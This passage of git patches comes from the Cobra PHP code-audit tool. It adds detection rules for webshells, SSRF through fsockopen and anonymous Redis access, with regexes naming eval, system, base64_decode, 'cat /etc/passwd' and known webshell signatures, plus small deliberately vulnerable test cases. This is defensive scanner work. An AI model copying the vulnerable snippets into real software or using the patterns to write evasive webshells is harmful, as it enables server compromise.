(\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\\s\\S]{0,200}array_walk(_recursive)?\s*\\([^;,]*,\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\\(\s*(file_get_contents\s*\\(\s*)?['\"]php://input)| - (^(\\xff\\xd8|\\x89\\x50|GIF89a|GIF87a|BM|\\x00\\x00\\x01\\x00\\x01)[\\s\\S]*<\\?\s*php)| - (\\$(\\w)=\$[a-zA-Z]\\('',\$\\w\\);\$\\1\\(\\);)| - (\$(\w+)\s*=\s*str_replace\s*\\([\\s\\S]*\$(\w+)\s*=\s*\$(\w+)(([\\s\\S]{0,255})|(\s*\\(\\'\\',\s*(\$(\w+)\s*\\(\s*)+))\$\\1\s*\\([\\s\\S]{0,100};?\s*\$\\2\\(?\s*\\))| + (\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*)| + ((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| + (\$\s*(\w+)\s*=[\s\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}(?<!\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)))| + ((preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| + (\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1))| + ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\s]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))))| + (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\))| + (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\))| + (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\$(\w*)\s*=\s*\bcreate_function\b\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\))| + (\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}))| + (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}(?<![:>\s])\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| + (sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\()| + (\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1) + (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1)| + (array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input)| + (^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php)| + (\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);)| + (\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\))| (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| - (eval\(\"\\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| - (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| - (preg_replace\s*\\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| - (ini_get\s*\(\s*\"disable_functions\"\s*\\)|\\d\s*=>\s*array\s*\\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\\(base64_decode\\(|crypt\\(\$_SERVER\['HTTP_H0ST'\\],\\d+\\)==|if\\(file_exists\\(\$settings\['STOPFILE'\\]\\)\\))| - (\$nofuncs='no\s*exec\s*functions|udf\\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\\.PHP\s*|c999shexit\\(\\)|\$c99sh_|c99_sess_put\\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\\(|coded\s*by\s*tjomi4|john\\.barker446@gmail\\.com|eval\\(\"\\\\\$x=gzin\"|eval\\(\"\\?>\"\\.gzinflate\\(base64_decode\\(|eval\\(gzinflate\\(base64_decode\\(|eval\\(gzuncompress\\(base64_decode\\(|eval\\(gzinflate\\(str_rot13\\(base64_decode\\(|function_exists\\(\"zigetwar_buff_prepare\"\\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\\(\"IIS://localhost/w3svc\"\\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\\(\"system\"==\$seletefunc\\)\\?system\\(\$shellcmd\\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\\.'code'|phpsocks5_encrypt\\(|define\\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\\(\$__C_C)| - (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\\(\"N3tsh_surl\"\\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\\]|function_exists\\(\"k1r4_sess_put\"\\)|http://www.7jyewu.cn/|scookie\\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\\('envlpass',|KingDefacer_getupdate\\(|relative2absolute\\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\\(\$cmd\\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\\(83\\)\\.\$_uU\\(84\\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\\\x50\\\\x4b\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| - (\$(\w+)[\\s]*\\=[\\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(?:\\1\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\\)|(\w+)\s*\\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(\\1\\(\s*\$\\2|\\2\\(\s*\$\\1)\s*\\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\\(\s*\$\\1\s*\\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\s*\\)) - - + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| + (eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| + (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| + (preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| + (ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\))| + (\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C)| + (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| + (\$(\w+)[\s]*\\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\\]\s*\)) ]]></match> <level value="7"/> From 476dcddc5d4d558e9b81204c6298cf9adf584d56 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 13:33:39 +0800 Subject: [PATCH 06/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-120004=20fsockopen?= =?UTF-8?q?=E9=80=A0=E6=88=90=E7=9A=84SSRF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-120003.xml | 2 +- rules/CVI-120004.xml | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+), 1 deletion(-) create mode 100644 rules/CVI-120004.xml diff --git a/rules/CVI-120003.xml b/rules/CVI-120003.xml index 9584d2c7..63b17a91 100644 --- a/rules/CVI-120003.xml +++ b/rules/CVI-120003.xml @@ -41,5 +41,5 @@ ``` </solution> <status value="on"/> - <author name="Lightless" email="viarus@qq.com"/> + <author name="Lightless" email="root@lightless.me"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-120004.xml b/rules/CVI-120004.xml new file mode 100644 index 00000000..340b9e8f --- /dev/null +++ b/rules/CVI-120004.xml @@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="fsockopen造成的SSRF"/> + <language value="php"/> + <match mode="function-param-controllable"><![CDATA[fsockopen]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $host = $_GET['host']; + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + ]]></case> + </test> + <solution> + ## 安全风险 + SSRF漏洞(Server-Side Request Forgery) + + ### 形成原理 + SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 + + ### 风险 + 1、攻击者可以对外网、服务器所在内网、本地进行端口扫描,获取服务的banner信息。 + 2、攻击运行在内网或本地的应用程序。 + 3、对内网web应用进行指纹识别。 + 4、攻击内外网的web应用。 + 5、利用file协议读取本地文件等。 + + ## 修复方案 + 1. 限制协议为HTTP、HTTPS + 2. 限制请求域名白名单 + 3. 禁止30x跳转 + + </solution> + <status value="on"/> + <author name="JoyChou" email="viarus@qq.com"/> +</cobra> \ No newline at end of file From 019b1eba3049603f25765a34c8561c718945c048 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 13:34:42 +0800 Subject: [PATCH 07/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-350002=20Redis?= =?UTF-8?q?=E5=8C=BF=E5=90=8D=E8=AE=BF=E9=97=AE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-350002.xml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/CVI-350002.xml diff --git a/rules/CVI-350002.xml b/rules/CVI-350002.xml new file mode 100644 index 00000000..0b22d73c --- /dev/null +++ b/rules/CVI-350002.xml @@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="Redis匿名访问"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\-\>connect\((['\"]\w+\.[\w\.]+?['\"]\s*,)\s*(\d+)[\),]]]></match> + <level value="4"/> + <test> + <case assert="true"><![CDATA[ + $redis = new Redis(); + $redis->connect('192.168.1.2', 6379); + $redis->auth('passwd123!#'); + $redis->set('key','SS'); + ]]></case> + </test> + <solution> + ## 安全风险 + Redis匿名访问 + + ## 修复方案 + 禁止使用匿名方式访问 + </solution> + <status value="on"/> + <author name="H4rdy" email="with.h4rdy@gmail.com"/> +</cobra> \ No newline at end of file From f2f1ed1604ec3003f400e0585134bf1f71eb32e8 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 17:10:36 +0800 Subject: [PATCH 08/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-360001=20CVI-360002?= =?UTF-8?q?=20CVI-360003=20CVI-360007=20=E5=A2=9E=E5=8A=A0webshell?= =?UTF-8?q?=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 46 ++++++------------------------ rules/CVI-360002.xml | 23 +++++++++++++++ rules/CVI-360003.xml | 23 +++++++++++++++ rules/CVI-360007.xml | 21 ++++++++++++++ tests/vulnerabilities/webshell.php | 18 ++++++++++++ 5 files changed, 93 insertions(+), 38 deletions(-) create mode 100644 rules/CVI-360002.xml create mode 100644 rules/CVI-360003.xml create mode 100644 rules/CVI-360007.xml create mode 100644 tests/vulnerabilities/webshell.php diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index 19aa4b10..5ca863e1 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml @@ -1,54 +1,24 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="WebShell"/> + <name value="webshell1"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*)| - ((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| - (\$\s*(\w+)\s*=[\s\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}(?<!\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)))| - ((preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| - (\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1))| - ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\s]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))))| - 